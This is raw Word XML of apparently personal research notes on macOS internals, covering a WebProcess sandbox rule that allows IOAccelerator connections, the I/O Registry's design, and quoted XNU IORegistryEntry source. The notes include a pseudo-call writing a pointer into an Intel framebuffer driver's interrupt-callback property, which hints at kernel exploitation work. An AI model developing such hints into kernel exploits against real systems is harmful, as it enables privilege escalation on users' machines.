    <w:p w:rsidR="00D93C14" w:rsidRDefault="00D93C14" w:rsidP="00D93C14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>om.apple.WebProcess.sb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="00D93C14" w:rsidP="002151C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">okit-connection </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOAccelerator</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="00F81EEC" w:rsidP="002151C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340E17D7" wp14:editId="26FC3FBD">
            <wp:extent cx="5274310" cy="257855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578552"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="00256CA2" w:rsidRDefault="00256CA2" w:rsidP="00256CA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOReg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00256CA2" w:rsidRDefault="00256CA2" w:rsidP="00256CA2"/>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4">
      <w:r>
        <w:t>The I/O Registry can be seen as an information hub between the kernel and user spaces. It is a kernel-resident,</w:t>
      </w:r>
      <w:r w:rsidRPr="008446B5">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in-memory database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that is both constructed and maintained dynamically. Its contents include the set of live I/O Kit objectssuch as families, nubs, and driversin a running system. On discovering new hardware, whether at boot time or at some point in a running system, the I/O Kit attempts to find a matching driver for the hardware and load it. If the driver is loaded successfully, the I/O Registry is updated to reflect the newly added or updated provider-client relationships between driver objects. The I/O Registry also tracks various other types of information, such as that related to power management and the state of a network controller. Consequently, the I/O Registry changes in various scenariosfor example, when a system wakes up from sleep.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4"/>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The I/O Registry is structured as an inverted tree, each of whose nodes is an object ultimately derived from the IORegistryEntry class. The tree's root node corresponds to the system's main logic board. A stack of I/O Kit objects can be visualized as a branch in the tree. A typical node in the tree represents a driver object, with each node having one or more properties, which can be of various types and in turn are represented by various data types such as numbers, strings, lists, and dictionaries. A node's properties may have multiple sources, with a typical source being the driver's personality, which could be seen as a set of key-value pairs describing the driver. Properties may also represent configurable information, statistics, or arbitrary driver state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4"/>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4"/>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4">
      <w:r>
        <w:t>There can be nodes in the I/O Registry that are contrary to the definition of a tree. For example, in the case of a RAID disk controller, several disks appear as one logical volume, with the consequence that some nodes have multiple parents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001011F4" w:rsidRDefault="001011F4" w:rsidP="001011F4"/>
    <w:p w:rsidR="001011F4" w:rsidRPr="001011F4" w:rsidRDefault="001011F4" w:rsidP="00256CA2"/>
    <w:p w:rsidR="007D2F19" w:rsidRDefault="007D2F19" w:rsidP="007D2F19">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialize </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D2F19" w:rsidRDefault="007D2F19" w:rsidP="00256CA2"/>
    <w:p w:rsidR="007D2F19" w:rsidRDefault="007D2F19" w:rsidP="00256CA2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB712D0" wp14:editId="3F7761CD">
            <wp:extent cx="5274310" cy="5860344"/>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5860344"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D2F19" w:rsidRDefault="007D2F19" w:rsidP="007D2F19">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IOReg initialization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D2F19" w:rsidRPr="006D0E0F" w:rsidRDefault="007D2F19" w:rsidP="00256CA2"/>
    <w:p w:rsidR="00256CA2" w:rsidRDefault="00A43021" w:rsidP="00256CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00256CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B561A" w:rsidRPr="009B561A" w:rsidRDefault="009B561A" w:rsidP="009B561A">
      <w:r w:rsidRPr="009B561A">
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\iokit\Kernel\IORegistryEntry.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="009B561A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9194F">
        <w:t>gRegistryRoot</w:t>
      </w:r>
      <w:r w:rsidR="009B561A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009B561A" w:rsidRPr="009B561A">
        <w:t>gIONameKey</w:t>
      </w:r>
      <w:r w:rsidR="009B561A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009B561A" w:rsidRPr="009B561A">
        <w:t>gIOLocationKey</w:t>
      </w:r>
      <w:r w:rsidR="009B561A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009B561A" w:rsidRPr="009B561A">
        <w:t xml:space="preserve"> gIORegistryEntryIDKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>IORegistryEntry * IORegistryEntry::initialize( void )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>ok;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if( !gRegistryRoot) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>gIORegistryLockGrpAttr = lck_grp_attr_alloc_init();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>//lck_grp_attr_setstat(gIORegistryLockGrpAttr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gIORegistryLockGrp = lck_grp_alloc_init("IORegistryLock",  gIORegistryLockGrpAttr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gIORegistryLockAttr = lck_attr_alloc_init();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>lck_attr_rw_shared_priority(gIORegistryLockAttr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>//lck_attr_setdebug(gIORegistryLockAttr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>lck_rw_init( &amp;gIORegistryLock, gIORegistryLockGrp, gIORegistryLockAttr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gRegistryRoot = new IORegistryEntry;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gPropertiesLock = IORecursiveLockAlloc();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gIORegistryPlanes = OSDictionary::withCapacity( 1 );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>assert( gRegistryRoot &amp;&amp; gPropertiesLock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>&amp;&amp; gIORegistryPlanes );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        ok = gRegistryRoot-&gt;init();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>if (ok)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    gRegistryRoot-&gt;reserved-&gt;fRegistryEntryID = ++gIORegistryLastID;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gIONameKey = OSSymbol::withCStringNoCopy( "IOName" );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gIOLocationKey = OSSymbol::withCStringNoCopy( "IOLocation" );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>gIORegistryEntryIDKey = OSSymbol::withCStringNoCopy( kIORegistryEntryIDKey );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>assert( ok &amp;&amp; gIONameKey &amp;&amp; gIOLocationKey );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>gRegistryRoot-&gt;setName( "Root" );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        gRegistryRoot-&gt;setProperty( kIORegistryPlanesKey, gIORegistryPlanes );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    return( gRegistryRoot );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9194F" w:rsidRPr="00C9194F" w:rsidRDefault="00C9194F" w:rsidP="00C9194F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9194F">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00256CA2" w:rsidRDefault="00FA5289" w:rsidP="00256CA2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00256CA2" w:rsidRDefault="00FA5289" w:rsidP="00256CA2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IORegistryEntry::setProperty(appleIntelFBController,</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fInterruptCallbacks</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,POINTER,8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="00F36ED4" w:rsidRDefault="00F36ED4" w:rsidP="002151C5"/>
    <w:p w:rsidR="00F36ED4" w:rsidRDefault="008F1F18" w:rsidP="00A73BBA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F1F18">
        <w:t>is_io_registry_entry_get_location_in_plane</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36ED4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A73BBA" w:rsidRDefault="00A73BBA" w:rsidP="00A73BBA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kern_return_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IORegistryEntryGetLocationInPlane</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>io_registry_entry_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
